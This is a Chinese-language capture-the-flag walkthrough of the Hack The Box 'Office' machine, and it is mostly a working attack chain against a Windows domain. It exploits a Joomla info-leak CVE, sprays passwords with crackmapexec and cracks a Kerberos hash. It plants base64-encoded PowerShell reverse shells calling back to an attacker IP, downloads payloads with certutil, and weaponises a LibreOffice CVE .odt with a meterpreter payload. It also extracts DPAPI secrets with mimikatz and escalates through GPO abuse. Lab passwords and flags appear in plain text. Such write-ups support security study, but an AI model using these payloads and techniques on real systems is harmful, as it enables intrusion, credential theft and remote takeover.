[Meachines][Hard]Office

2024-05-09 635 0

Main

$ nmap -sC -sV 10.10.11.3 --min-rate 1000
CMS:joomla
[Meachines][Hard]Office插图
# echo '10.10.11.3 office.htb DC.office.htb'>>/etc/hosts
在扫描报告中,可以看到robots.txt目录泄露
http://10.10.11.3/administrator/index.php
[Meachines][Hard]Office插图1
根据CVE-2023-23752存在未授权访问
[Meachines][Hard]Office插图2
http://10.10.11.3/api/index.php/v1/config/application?public=true

[Meachines][Hard]Office插图3

很可惜这并不是web后台登录密码

username:root
password:H0lOgrams4reTakIng0Ver754!

Kerbrute

  • Kerbrute是一款用于渗透测试和红队操作的开源工具,专门用于暴力破解Kerberos协议。Kerberos是一种网络身份验证协议,通常用于Windows活动目录环境中,用于实现单点登录和安全身份验证。

  • 用户枚举:Kerbrute可以通过暴力破解Kerberos预身份验证(Pre-Authentication)来枚举有效用户帐户。这有助于发现目标系统上存在的有效用户。

  • 密码爆破:它可以尝试使用暴力破解技术猜解用户的密码,从而获取对目标系统的访问权限。Kerbrute支持使用字典和组合字典进行密码爆破攻击。

  • 票据传递(Pass-the-Ticket)攻击:Kerbrute可以捕获有效用户的Kerberos票据,并尝试利用这些票据进行票据传递攻击,从而获取对其他系统的访问权限。

  • 模块化设计:它采用模块化设计,允许用户自定义和扩展其功能,以满足不同的渗透测试需求。
    $ sudo apt install golang-go
    $ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
    $ chmod 777 kerbrute_linux_amd64
    $ ./kerbrute_linux_amd64 userenum --dc DC.office.htb -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o recore.log
    $ grep -oP '\S+(?=@office\.htb)' recore.log | sort | uniq >Users.txt
    尝试枚举用户
    [Meachines][Hard]Office插图4

crackmapexec

  • CrackMapExec(CME)是一款用于渗透测试和红队行动的开源工具,用于自动化利用Windows活动目录(Active Directory)网络的渗透测试和攻击。它提供了一系列功能,包括:

  • 用户认证和信息收集:CME可以通过多种方式(例如SMB、LDAP、RDP等)对Windows主机进行身份验证,并收集关于用户、组、计算机等对象的信息。

  • 漏洞利用:CME可以利用已知的Windows漏洞,如SMB中的MS08-067、MS17-010等,从而获取对目标系统的访问权限。

  • 会话管理:它可以建立、管理和操纵用户会话,执行命令并在目标系统上执行各种操作。
    内网渗透:CME可以在Windows活动目录环境中执行各种内网渗透技术,如Pass-the-Hash(PTH)、Pass-the-Ticket(PTT)等,以获取更高的权限。
    模块化框架:它是一个模块化的工具,允许用户自定义和扩展其功能,使其能够适应不同的渗透测试需求。

$ crackmapexec smb 10.10.11.3 -u Users.txt -p 'H0lOgrams4reTakIng0Ver754!' --shares

[Meachines][Hard]Office插图5

我们得知dwolfe用户可以使用服务器的SMB共享资源

$ smbclient //10.10.11.3/SOC\ Analysis -U dwolfe%H0lOgrams4reTakIng0Ver754!
[Meachines][Hard]Office插图6

smb: \> get Latest-System-Dump-8fbc124d.pcap ./Main.pacap

https://www.bilibili.com/video/BV1uf421D7Sm/

我可以看到在加密部分etype指定为AES256加密,cipher密文
复制密文a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

https://hashcat.net/wiki/doku.php?id=example_hashes

我们需要构建完整的解密结构

[Meachines][Hard]Office插图7

公式:$krb5pa$18$(USERNAME)$(DC_Server)$(Cipher)

etype选择18

[Meachines][Hard]Office插图8

使用用户tstark
[Meachines][Hard]Office插图9

解密密文结构:$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

保存到hash

$ hashcat -m 19900 hash /usr/share/wordlists/rockyou.txt

[Meachines][Hard]Office插图10

username:tstark
password:playboy69

尝试用这个密码登录web后台管理员administrator

[Meachines][Hard]Office插图11

[Meachines][Hard]Office插图12

[Meachines][Hard]Office插图13
这里的主机是windows,所以需要反弹powershell
https://www.revshells.com/
exec("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA1ACIALAAxADAAMAAzADIAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA");

[Meachines][Hard]Office插图14
[kali]
$ wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
``
$ python3 -m http.server 80
[Meachines][Hard]Office插图15

[靶机]
> cd c:\\Users\Public\Downloads
> certutil -urlcache -split -f http://10.10.16.15/RunasCs.exe RunasCs.exe
> .\RunasCs.exe tstark playboy69 powershell -r 10.10.16.15:10033
[Meachines][Hard]Office插图16

[Meachines][Hard]Office插图17

User Flag

> type c:\\Users\tstark\Desktop\user.txt

[Meachines][Hard]Office插图18

50a96aa18344772ec1c10135ff5141d8

Root Flag

[靶机]

(tstark)> netstat -avn

[Meachines][Hard]Office插图19

(tstark)> cd C:\Users\Public\Downloads
(tstark)> certutil -urlcache -split -f http://10.10.16.15/chisel.exe chisel.exe

[Meachines][Hard]Office插图20

(tstark)> .\chisel.exe client 10.10.16.15:5564 R:8083:127.0.0.1:8083

[kali]
$ chisel server --port 5564 --reverse
[Meachines][Hard]Office插图21

[Meachines][Hard]Office插图22

kali访问http://127.0.0.1:8083

[Meachines][Hard]Office插图23

在Submit Application页面是一个简历申请表,存在一处文件上传

[Meachines][Hard]Office插图24

这里利用 LibreOffice漏洞CVE-2023-2255

[Kali]

$ git clone https://github.com/elweth-sec/CVE-2023-2255.git

$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\reverse.exe' --output 'exploit.odt'

再使用msfvenom生成稳定的会话

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.15 LPORT=10035 -f exe -o reverse.exe
$ msfconsole -x 'use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 10.10.16.15;set LPORT 10035;run'
[Meachines][Hard]Office插图25

[靶机]
> cd C:\Users\Public\
> certutil -urlcache -split -f http://10.10.16.15/reverse.exe reverse.exe
[Meachines][Hard]Office插图26

再将exploit.odt上传到个人简历
差不多等个3分钟左右...

[Meachines][Hard]Office插图27

[靶机]
进入powershell
(ppotts) PS> cd C:\Users\Public\Downloads
(ppotts) PS> Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
定位的凭据文件
[Meachines][Hard]Office插图28

(ppotts) PS> Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
定位主键
[Meachines][Hard]Office插图29
主密钥(master key)是一个加密的对称密钥,可以用来解密其他内容。因此,提取加密的主密钥是很有意义的,因为这样可以后续解密使用该主密钥加密的其他内容。
(ppotts) PS> certutil -urlcache -split -f http://10.10.16.15/mimikatz.exe mimikatz.exe
(ppotts) PS> .\mimikatz.exe
mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
获取主钥
[Meachines][Hard]Office插图30

dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166

[Meachines][Hard]Office插图31

[Meachines][Hard]Office插图32

使用evil-winrm连接主机

[kali]
$ vim /etc/proxychains4.conf

[Meachines][Hard]Office插图33

$ chisel server -p 9002 --reverse --socks5
[靶机]
(ppotts) PS> cd C:\Users\Public\Downloads
(ppotts) PS> .\chisel.exe client 10.10.16.15:9002 R:socks
[kali]
username:HHogan
password:H4ppyFtW183#

我们是无法直接访问目标端口9002,所以需要通过代理来绕过
[Meachines][Hard]Office插图34

下载https://github.com/byronkg/SharpGPOAbuse/releases/download/1.0/SharpGPOAbuse.exe

  • SharpGPOAbuse 是一种用于利用 Windows 环境中的 Group Policy Objects (GPOs) 的工具。GPOs 是 Windows 中用于配置计算机和用户操作环境的策略设置。通过 GPOs,系统管理员可以定义许多安全策略、网络设置、应用程序设置等。

  • SharpGPOAbuse 允许攻击者在合法的 Active Directory 环境中执行恶意代码,通过修改或滥用 GPOs 实现权限提升、执行代码、横向移动等攻击。它可以用于在目标系统上执行各种恶意操作,例如启动远程 shell、添加新用户、获取 NTLM hash 等。

[kali]
$ wget https://github.com/byronkg/SharpGPOAbuse/releases/download/1.0/SharpGPOAbuse.exe
[靶机]
*Evil-WinRM* PS C:\Users\HHogan\Documents> cd ../
*Evil-WinRM* PS C:\Users\HHogan\Documents> certutil -urlcache -split -f http://10.10.16.15/SharpGPOAbuse.exe SharpGPOAbuse.exe

[Meachines][Hard]Office插图35

添加为管理员,并且刷新配置

*Evil-WinRM* PS C:\Users\HHogan\> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "s-h4ck13" --Author office\Administrator --Command "cmd.exe" --Arguments "<C>" --GPOName "Default Domain Controllers Policy"
*Evil-WinRM* PS C:\Users\HHogan\> gpupdate /force"
[Meachines][Hard]Office插图36

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "s-h4ck13" --Author office\Administrator --Command "cmd.exe" --Arguments "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA1ACIALAAxADAAMAAzADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --GPOName "Default Domain Controllers Policy" --Force

[Meachines][Hard]Office插图37

[Meachines][Hard]Office插图38

PS C:\Windows\system32> type c:\\Users\Administrator\Desktop\root.txt

[Meachines][Hard]Office插图39

5224918ae4a25196417ca0a559a084e6

文献:
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论